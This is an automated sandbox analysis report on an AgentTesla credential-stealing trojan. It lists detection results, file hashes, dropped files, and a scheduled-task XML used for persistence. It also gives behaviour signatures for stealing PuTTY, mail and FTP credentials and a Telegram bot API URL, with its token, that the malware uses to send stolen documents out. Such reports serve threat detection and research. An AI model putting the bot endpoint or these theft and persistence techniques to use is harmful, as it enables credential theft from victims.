SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe 15 2 7->11         started        15 powershell.exe 24 7->15         started        17 schtasks.exe 1 7->17         started        19 SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe 7->19         started        signatures5 process6 dnsIp7 33 api.telegram.org 149.154.167.220, 443, 49751 TELEGRAMRU United Kingdom 11->33 51 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->51 53 Tries to steal Mail credentials (via file / registry access) 11->53 55 Tries to harvest and steal ftp login credentials 11->55 57 2 other signatures 11->57 21 conhost.exe 15->21         started        23 conhost.exe 17->23         started        signatures8 process9

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe37%VirustotalBrowse
                    SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe33%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\gfLnSNNH.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\gfLnSNNH.exe33%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    SourceDetectionScannerLabelLinkDownload
                    11.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                    11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                    11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                    11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                    11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                    https://1Z2zbEimUPt561zauMh.comp0%Avira URL Cloudsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://gWlKgh.com0%Avira URL Cloudsafe
                    https://api.telegram.org4mi0%Avira URL Cloudsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.zhongyicts.com.cnbJf0%Avira URL Cloudsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    https://1Z2zbEimUPt561zauMh.com0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cno.0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.telegram.org
                    149.154.167.220
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://api.telegram.org/bot5187728823:AAGLMGn_JlHiLgjLPDeSA29u69fic0Upi8Y/sendDocumentfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.591209742.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://www.apache.org/licenses/LICENSE-2.0SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.fontbureau.comSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.fontbureau.com/designersGSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.com/designers/?SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.founder.com.cn/cn/bTheSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://api.telegram.orgSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.591914892.00000000031F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designers?SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.org/bot5187728823:AAGLMGn_JlHiLgjLPDeSA29u69fic0Upi8Y/sendDocumentdocument-----SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.591209742.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.591209742.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://1Z2zbEimUPt561zauMh.compSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.591209742.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.tiro.comSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designersSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.goodfont.co.krSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://gWlKgh.comSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.591209742.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://api.telegram.org4miSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.591914892.00000000031F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.carterandcone.comlSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.sajatypeworks.comSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.typography.netDSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers/cabarga.htmlNSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.founder.com.cn/cn/cTheSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.zhongyicts.com.cnbJfSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000003.328125590.00000000009DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://fontfabrik.comSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.founder.com.cn/cnSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers/frere-jones.htmlSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://1Z2zbEimUPt561zauMh.comSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.591209742.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.591896163.00000000031EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.jiyu-kobo.co.jp/SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://DynDns.comDynDNSnamejidpasswordPsi/PsiSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.591209742.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.galapagosdesign.com/DPleaseSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.zhongyicts.com.cno.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000003.328125590.00000000009DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers8SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.fonts.comSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.sandoll.co.krSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.urwpp.deDPleaseSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.zhongyicts.com.cnSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000003.328125590.00000000009DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://api.telegram.orgSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.591945120.0000000003208000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.383649401.0000000002831000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.591914892.00000000031F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.sakkal.comSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://api.telegram.org/bot5187728823:AAGLMGn_JlHiLgjLPDeSA29u69fic0Upi8Y/SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.385148858.0000000003920000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000000.380187525.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000000.379081900.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                      high
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      149.154.167.220
                                                      api.telegram.orgUnited Kingdom
                                                      62041TELEGRAMRUfalse
                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                      Analysis ID:620054
                                                      Start date and time: 04/05/202210:24:092022-05-04 10:24:09 +02:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 13m 3s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.29978 (renamed file extension from 29978 to exe)
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:26
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@11/8@1/1
                                                      EGA Information:
                                                      • Successful, ratio: 66.7%
                                                      HDC Information:
                                                      • Successful, ratio: 0.1% (good quality ratio 0.1%)
                                                      • Quality average: 64.3%
                                                      • Quality standard deviation: 2.4%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                      • Execution Graph export aborted for target SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, PID 576 because there are no executed function
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      TimeTypeDescription
                                                      10:25:58API Interceptor626x Sleep call for process: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe modified
                                                      10:26:09API Interceptor38x Sleep call for process: powershell.exe modified
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):1308
                                                      Entropy (8bit):5.345811588615766
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                                      MD5:2E016B886BDB8389D2DD0867BE55F87B
                                                      SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                                      SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                                      SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                                      Malicious:true
                                                      Reputation:high, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):22204
                                                      Entropy (8bit):5.600567698561644
                                                      Encrypted:false
                                                      SSDEEP:384:DtMjDyq02GY0m2xYepS0nEjultI847nvng3MdInYM0+CfmAV7q2DxyNZQvnI++Cg:ann2DTECltPM6vDt2pWx+8
                                                      MD5:2EE833817F520E9C6A9EFB4523F40954
                                                      SHA1:71DC87ADC78AB492B9CAA6EB095280688B14DC49
                                                      SHA-256:7B1614081656907B6E0F6A171835C3026C0C738620633B4C7DF1BF95936136FF
                                                      SHA-512:C0AECE1849924D5C37B5FE0A21489F391A2B9D2B3F8C161D25C1A68CFF756DFF1467B82819E0E8B381988EE21F4C6A0F93039E7D5EDB159756D37DB2993A7538
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:@...e...........g.......K.............X...-..........@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.4................Zg5..:O..g..q..........System.Xml..@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):1595
                                                      Entropy (8bit):5.147527481738634
                                                      Encrypted:false
                                                      SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtlb+xvn:cge4MYrFdOFzOzN33ODOiDdKrsuTlbyv
                                                      MD5:455152CAA2DDF76365D4C3FAE03EACD0
                                                      SHA1:1A77B4CD9BD015A1743875F2E84A65C15C1D88F0
                                                      SHA-256:059A8966FD65AA4BB14C44009205A7D21BF0700919F495ED5834AE6B8F71C7FD
                                                      SHA-512:47B55B3364A207DDFCDF2A39AFB8430F90BA397456F144BAD6D1BD3D83ED73AC21E62E06F6C48974DBA2BE512FF90576E9B36D526D50E1D4810B5FFA048AEFE7
                                                      Malicious:true
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):715264
                                                      Entropy (8bit):7.672095818652826
                                                      Encrypted:false
                                                      SSDEEP:12288:+V2L2Ij3hxwDvVbyP8wqEBI1sIAzYy3/w+8RqbVVte2moi2bOxNtbs5:M2p3MDvVmkwqYnIA/ItWVVtX
                                                      MD5:B78EED700665BF868771E371D2622000
                                                      SHA1:48DAA093155E9EAA563F6EB537A57F940F2AA6C6
                                                      SHA-256:9EEAC4773D7F0E7F4303BAED25C04F0B138E55F9FA7E7C718E3E6599A2E41513
                                                      SHA-512:C8A943811BA8173A49941A85803A5DC0084C4EAB90D7A79F3E4115992FFE6F115237B0B56E85AAAF940F6D2E6A1B1FAC31541F32554C799BD259BCB3E5873E58
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 33%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0......Z......z.... ........@.. .......................@............@.................................(...O.......@V................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...@V.......X..................@..@.reloc....... ......................@..B................\.......H...........P=......5...l.................................................{....*"..}....*..{....*"..}....*f.(........(.......(.....*.0............}.....(.......(.......{....(......{....o....&~&...{.........,...{....r...po......+...{....~&...{....o....o.......{....~&...|....(....o......{....~&...{....o.....~'...{.........,...{....r...po......+...{....~'...{....o....o.......{....~'...|....(....o......{....~'...{....o.....*&..(.....*...0..+.........,..{.......+....,...{....o....
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):5781
                                                      Entropy (8bit):5.40404328792958
                                                      Encrypted:false
                                                      SSDEEP:96:BZfhZNwsqDo1ZGGZmhZNwsqDo1ZgLVzjZKhZNwsqDo1Zd6DDGZ1:g
                                                      MD5:61BB7C485C4B0BA3401E9958F232CF7B
                                                      SHA1:AB480A972FCA142B96429B1E6FAC5C666FF724CD
                                                      SHA-256:B7B71A79AB3ED388F28B10F26C67E4661D17B8AEF70663031322D23EF10F97C1
                                                      SHA-512:04FC3E6590427E5A79F39011A076A4799EB5B8981C1D34DF374D88F78CA31316FF40F5168F79C39526FE166A14DFED0004199F3CAAA6D7ED9DFFDED8FEF738CD
                                                      Malicious:false
